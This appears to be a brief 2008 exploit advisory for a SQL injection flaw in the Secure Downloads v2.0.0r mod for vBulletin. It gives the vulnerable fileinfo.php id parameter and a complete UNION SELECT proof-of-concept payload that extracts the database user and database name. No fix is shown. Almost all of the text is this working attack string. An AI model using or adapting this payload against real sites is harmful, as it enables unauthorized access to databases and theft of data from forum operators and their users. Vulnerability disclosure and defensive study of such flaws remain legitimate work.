Secure Downloads v2.0.0r for vBulletin SQL Injection Vulnerability
2008-12-08 22:00:03[~] vBulletin (Mode Secure Downloads v2.0.0r) SQL Injection Vulnerability
[~] Mod : http://www.1src.com/freeware/download.php?id=1880
[~] Author : Cn4phux
[~] PoC :
[~] URL.com/fileinfo.php?id=[SQL]
[~] : 1797'+AND(0)+UNION+SELECT+1,1,1,1,1,'Cn4phux',0,0,0,1,0,1,0,0,0,0,0,USER(),DATABASE(),0,0,0,0,0,0,0+OR+'1'='0
//Cn4phux.
#
Fixes
No fixesIn order to submit a new fix you need to be registered.